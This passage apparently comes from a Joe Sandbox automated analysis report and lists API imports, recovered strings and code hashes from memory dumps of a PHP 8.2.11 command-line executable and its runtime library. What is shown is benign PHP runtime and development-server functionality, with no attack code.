                                                • API ID: __p___argc__p___argv__scrt_acquire_startup_lock__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock_cexit_exit_get_initial_narrow_environment_register_thread_local_exe_atexit_callback
                                                • String ID:
                                                • API String ID: 3019265742-0
                                                • Opcode ID: 0b51e11ed76521ded2dc44554ca0a3edc73af59089158bb7bcb4175d26705f2c
                                                • Instruction ID: 333af7c6c08cb00ab3b2a598237349fd858ce53a6059f99ee53b6a888b87f945
                                                • Opcode Fuzzy Hash: 0b51e11ed76521ded2dc44554ca0a3edc73af59089158bb7bcb4175d26705f2c
                                                • Instruction Fuzzy Hash: 06315621A0D342C1EB10BF2DD4113B9E2B9AF66784FC44839EA4D476D3CF2DA4698260
                                                APIs
                                                  • Part of subcall function 00007FF7498CC20C: _initialize_onexit_table.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,00007FF7498CBF34), ref: 00007FF7498CC246
                                                • _RTC_Initialize.LIBCMT ref: 00007FF7498CBF38
                                                • _configthreadlocale.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF7498CBF84
                                                • _initialize_narrow_environment.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7498CBF92
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: Initialize_configthreadlocale_initialize_narrow_environment_initialize_onexit_table
                                                • String ID:
                                                • API String ID: 3623540455-0
                                                • Opcode ID: e2ee652f017bb5235b9bb3d929f129e0d50596157e2c27a12bf4c7f9274e1cb4
                                                • Instruction ID: 2312fc7f311d7e0d3efb8bceca43e20b7e9eb9564433a58f584ff52687548a6a
                                                • Opcode Fuzzy Hash: e2ee652f017bb5235b9bb3d929f129e0d50596157e2c27a12bf4c7f9274e1cb4
                                                • Instruction Fuzzy Hash: A9116A11E1C703D5FA587FBD94926B981B88FA1381FC45834E60D976C3EF1CA86986B2
                                                APIs
                                                  • Part of subcall function 00007FF7498C1900: _php_stream_open_wrapper_ex.PHP8TS ref: 00007FF7498C1932
                                                  • Part of subcall function 00007FF7498C1900: _php_stream_open_wrapper_ex.PHP8TS ref: 00007FF7498C1954
                                                  • Part of subcall function 00007FF7498C1900: _php_stream_open_wrapper_ex.PHP8TS ref: 00007FF7498C1976
                                                  • Part of subcall function 00007FF7498C1900: zend_register_constant.PHP8TS ref: 00007FF7498C1A30
                                                  • Part of subcall function 00007FF7498C1900: zend_register_constant.PHP8TS ref: 00007FF7498C1A62
                                                  • Part of subcall function 00007FF7498C1900: zend_register_constant.PHP8TS ref: 00007FF7498C1A94
                                                • php_execute_script.PHP8TS ref: 00007FF7498C2827
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: _php_stream_open_wrapper_exzend_register_constant$php_execute_script
                                                • String ID:
                                                • API String ID: 371503814-0
                                                • Opcode ID: 81c57e5145dae83e29e8fdc5259998f075271bb271b9ec584aa362c08632d16b
                                                • Instruction ID: c456e221186ad2a7aa4bf69831b4f36cc2c93ebca8b1c87f58b4400cb9b5cc6c
                                                • Opcode Fuzzy Hash: 81c57e5145dae83e29e8fdc5259998f075271bb271b9ec584aa362c08632d16b
                                                • Instruction Fuzzy Hash: 8DE0C965A0DB46C6E714BF29E858679A378FB88B80F940135DA4E427A4CF6CE468D720
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: free$memmove$__acrt_iob_funcfprintfwcsncmp$ErrorLastphp_getoptzend_hash_destroy@@8$_efree@@8_set_errnoclosesocketmallocphp_selectphp_socket_strerrorphp_win32_code_to_errnophp_win32_cp_conv_ascii_to_wphp_win32_cp_conv_cur_to_wphp_win32_cp_conv_to_wphp_win32_cp_conv_utf8_to_wphp_win32_cp_get_by_idphp_win32_cp_use_unicodephp_win32_ioutil_normalize_path_wphp_win32_ioutil_stat_ex_wreallocsignalstrchrvirtual_getcwdvirtual_realpath
                                                • String ID: %s is not a directory.$8.2.11$Directory %s does not exist.$Document root path is too long.$PHP %s Development Server (http://%s%s%s:%d) started$\??\$\\?\$\\?\UNC\
                                                • API String ID: 3277354628-2852613766
                                                • Opcode ID: 8c93954c6ced0220989b0e366829cc54aead6a210609f2b6194a2b8fe6ddaebd
                                                • Instruction ID: fd8501b0f698afb0935bb8a3556af6aa88d7627fa40986b7ab0cdf0fd7cc6db1
                                                • Opcode Fuzzy Hash: 8c93954c6ced0220989b0e366829cc54aead6a210609f2b6194a2b8fe6ddaebd
                                                • Instruction Fuzzy Hash: DC126B61A0CB42C5EB10BF19E8546B9E3B9FB84794FC04136DA4E43AA8DF3DE565C720
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: closesocket$ErrorLastfreehtons$__zend_mallocbindgetsocknamelistenphp_network_freeaddressesphp_network_getaddressesphp_socket_error_strsetsockoptsocket
                                                • String ID:
                                                • API String ID: 218662337-0
                                                • Opcode ID: 35c43f8db9ddfd3d81eaef26489d84727e7901e10b2ff3b5887cd490dd5df3d3
                                                • Instruction ID: a8e875f28c9e61decfead145d61725781250ee24251c9a7a644aa8bc9432fcd1
                                                • Opcode Fuzzy Hash: 35c43f8db9ddfd3d81eaef26489d84727e7901e10b2ff3b5887cd490dd5df3d3
                                                • Instruction Fuzzy Hash: F8615E21A0CB46C6E754BF699448239F3B8FB44BA1F848336DA6E477D4EF3C94659320
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                • String ID:
                                                • API String ID: 313767242-0
                                                • Opcode ID: 3d435e9e628bf398d9dc564d4999422fffc84ae9fc7b77db05bdc8e354c6d876
                                                • Instruction ID: 0743c9fd8fb7b17f380e5e44b54e2c00e283f2fe917f4f16e65604ddf57fa4c7
                                                • Opcode Fuzzy Hash: 3d435e9e628bf398d9dc564d4999422fffc84ae9fc7b77db05bdc8e354c6d876
                                                • Instruction Fuzzy Hash: 06312D72609B81CAEB60BF68E8403E9B374FB94744F844439DA4E47A94DF38D559C720
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmp
                                                • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmp
                                                • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmp
                                                • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: Name::operator+
                                                • String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $auto$bool$char$char16_t$char32_t$char8_t$const$decltype(auto)$double$float$int$long$long $short$signed $this $unsigned $void$volatile$wchar_t
                                                • API String ID: 2943138195-1482988683
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: free$ErrorLastphp_win32_code_to_errnowcsncmp$_set_errno$mallocmemmovephp_win32_cp_conv_ascii_to_wphp_win32_cp_conv_cur_to_wphp_win32_cp_conv_to_wphp_win32_cp_conv_utf8_to_wphp_win32_cp_get_by_idphp_win32_cp_use_unicodephp_win32_ioutil_normalize_path_wphp_win32_ioutil_open_wrealloc
                                                • String ID: \??\$\\?\$\\?\UNC\
                                                • API String ID: 1464380497-3428951470
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: smart_str_realloc@@16$smart_str_erealloc@@16$memmove
                                                • String ID: HTTP$Unknown Status Code
                                                • API String ID: 1291240017-3405413774
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: smart_str_erealloc@@16smart_str_realloc@@16$memmove$_efree@@8gettimeofdayphp_format_datezend_hash_str_find@@24
                                                • String ID: GMT$D, d M Y H:i:s$Date: $Host: $host
                                                • API String ID: 1682851168-854820404
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: zend_strndup@@16$__acrt_iob_func_zend_hash_init@@32fprintffreestrchrstrtol$__stdio_common_vfprintf_efree@@8getenvphp_set_sock_blockingzend_hash_str_add@@32
                                                • String ID: Failed to listen on %s:%d (reason: %s)$Failed to make server socket non-blocking$Invalid address: %s$PHP_CLI_SERVER_WORKERS$forking is not supported on this platform
                                                • API String ID: 2318142898-2925817685
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __zend_malloc_efree@@8$ErrorLast_zend_hash_init@@32free$acceptclosesocketmemmovephp_network_populate_name_from_sockaddrphp_set_sock_blockingphp_socket_strerrorzend_hash_index_find@@16zend_hash_index_update@@24zend_vspprintf
                                                • String ID: %s Accepted$Failed to accept a client (reason: %s)
                                                • API String ID: 652531883-3364014137
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: Name::operator+$Replicator::operator[]
                                                • String ID: `anonymous namespace'
                                                • API String ID: 3863519203-3062148218
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: free$send$ErrorLast__zend_malloc__zend_strdup_close_efree@@8_errno_readstrerrorzend_hash_index_del@@16zend_vspprintf
                                                • String ID: %s Closing
                                                • API String ID: 1972148529-2100637938
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: smart_str_realloc@@16$__zend_malloc__zend_strdup_errnoap_php_snprintfbsearchmemmovephp_escape_html_entities_exstrerrorstrncmp
                                                • String ID: Type: $t=UTF-8$text/
                                                • API String ID: 2476624890-508784794
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: NameName::$Name::operator+atolswprintf_s
                                                • String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-$lambda$nullptr
                                                • API String ID: 2331677841-2441609178
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: _efree@@8$zend_spprintf$php_win32_console_fileno_has_vt100php_win32_console_fileno_is_consolezend_vspprintf
                                                • String ID: - %s$ - %s in %s on line %d$%s [%d]: %s %s$%s%s%s
                                                • API String ID: 2680666100-2629286828
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: zval_ptr_dtor$_emalloc@@8gc_possible_root@@8memmoveobject_init_exstrstrzend_call_known_functionzend_objects_store_del@@8zend_print_zvalzend_read_property
                                                • String ID: Exception: %s$message
                                                • API String ID: 3707280532-2516933299
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: _efree@@8php_register_variable_safestrcmp$_estrndup@@16toupperzend_spprintf
                                                • String ID: %s_%s$CONTENT_LENGTH$CONTENT_TYPE$HTTP
                                                • API String ID: 2128054003-3041116971
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: ConsoleTitlefreephp_error_docrefphp_win32_cp_conv_ascii_to_wphp_win32_cp_conv_to_wphp_win32_cp_conv_utf8_to_wphp_win32_cp_get_by_idphp_win32_cp_use_unicodestrncpyzend_parse_parameters
                                                • String ID: cli_set_process_title had an error: %s
                                                • API String ID: 2486298838-2934626287
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: free$zend_hash_destroy@@8$_closeclosesocketshutdown
                                                • String ID:
                                                • API String ID: 333189319-0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: Name::operator+
                                                • String ID:
                                                • API String ID: 2943138195-0
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: BlockFrameHandler3::Unwindabortterminate$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                • String ID: csm$csm$csm
                                                • API String ID: 4223619315-393685449
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: Replicator::operator[]
                                                • String ID: `generic-type-$`template-parameter-$generic-type-$template-parameter-
                                                • API String ID: 3676697650-3207858774
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: php_register_variable
                                                • String ID: DOCUMENT_ROOT$PATH_TRANSLATED$PHP_SELF$SCRIPT_FILENAME$SCRIPT_NAME
                                                • API String ID: 1046779695-3953231635
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: Name::operator+
                                                • String ID:
                                                • API String ID: 2943138195-0
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: zend_hash_str_find@@24$php_handle_auth_dataphp_request_shutdownphp_request_startupzend_hash_index_del@@16
                                                • String ID: %s Closing$authorization$content-type
                                                • API String ID: 2965644037-1119257318
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: Name::operator+
                                                • String ID: `unknown ecsu'$class $coclass $cointerface $enum $struct $union
                                                • API String ID: 2943138195-1464470183
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: php_error_docrefzend_wrong_parameters_none_error@@0
                                                • String ID: cli_get_process_title had an error: %s
                                                • API String ID: 3457622264-425036436
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: _efree@@8$display_ini_entriesphp_info_print_modulezend_hash_str_find@@24zend_str_tolower_dup@@16
                                                • String ID: Extension '%s' not present.$main
                                                • API String ID: 2523902372-211226541
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: smart_str_erealloc@@16$memmove$_efree@@8zend_llist_get_first_exzend_llist_get_next_ex
                                                • String ID:
                                                • API String ID: 2789854044-0
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: abortterminate$Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                • String ID: csm$csm$csm
                                                • API String ID: 211107550-393685449
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: Name::operator+
                                                • String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
                                                • API String ID: 2943138195-2239912363
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: ErrorLastrecv
                                                • String ID: Malformed HTTP request$Unexpected EOF$Unsupported SSL request
                                                • API String ID: 2514157807-902952500
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: FileHeader$ExceptionFindInstanceRaiseTargetType
                                                • String ID: Access violation - no RTTI data!$Attempted a typeid of nullptr pointer!$Bad dynamic_cast!$Bad read pointer - no RTTI data!
                                                • API String ID: 1852475696-928371585
                                                APIs
                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FFE1A526D1B,?,?,00000000,00007FFE1A526B4C,?,?,?,?,00007FFE1A526885), ref: 00007FFE1A526BE1
                                                • GetLastError.KERNEL32(?,?,?,00007FFE1A526D1B,?,?,00000000,00007FFE1A526B4C,?,?,?,?,00007FFE1A526885), ref: 00007FFE1A526BEF
                                                • wcsncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFE1A526D1B,?,?,00000000,00007FFE1A526B4C,?,?,?,?,00007FFE1A526885), ref: 00007FFE1A526C08
                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FFE1A526D1B,?,?,00000000,00007FFE1A526B4C,?,?,?,?,00007FFE1A526885), ref: 00007FFE1A526C1A
                                                • FreeLibrary.KERNEL32(?,?,?,00007FFE1A526D1B,?,?,00000000,00007FFE1A526B4C,?,?,?,?,00007FFE1A526885), ref: 00007FFE1A526C60
                                                • GetProcAddress.KERNEL32(?,?,?,00007FFE1A526D1B,?,?,00000000,00007FFE1A526B4C,?,?,?,?,00007FFE1A526885), ref: 00007FFE1A526C6C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: Library$Load$AddressErrorFreeLastProcwcsncmp
                                                • String ID: api-ms-
                                                • API String ID: 916704608-2084034818
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __acrt_iob_func_ctime64_s_ftime64fprintf
                                                • String ID: [%s] %s$etched$unknown
                                                • API String ID: 3974593538-288210727
                                                • Opcode ID: 711c989eaf5095a6ce6268eb38f1218eb3a9d0acb8db87d083ca41e06770af98
                                                • Instruction ID: 3468a2da99a2ad69612d919e173323284aeab03bacec63fc6d553ad373319282
                                                • Opcode Fuzzy Hash: 711c989eaf5095a6ce6268eb38f1218eb3a9d0acb8db87d083ca41e06770af98
                                                • Instruction Fuzzy Hash: B321916192DB82C5EB10BF19E440675F378EF98790FD01235EA6E427A5DF2CE0A0CB20
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                 • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmp
                                                 • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmp
                                                 • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmp
                                                 • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: abort$AdjustPointer
                                                • String ID:
                                                • API String ID: 1501936508-0
                                                • Opcode ID: cf0ce418dbf8095189d4875bbd922365259c44d693191a2e82a2bfde5589004d
                                                • Instruction ID: 241caae712970f75e3c1c9cd5adc62efc0acb62da631b1025390f39233bbd73c
                                                • Opcode Fuzzy Hash: cf0ce418dbf8095189d4875bbd922365259c44d693191a2e82a2bfde5589004d
                                                • Instruction Fuzzy Hash: 7251AB7AB4DF42D1EA659BA2944467C62A6BF46FE0F0940F7DA4D067B5DE3CE482C300
                                                APIs
                                                Memory Dump Source
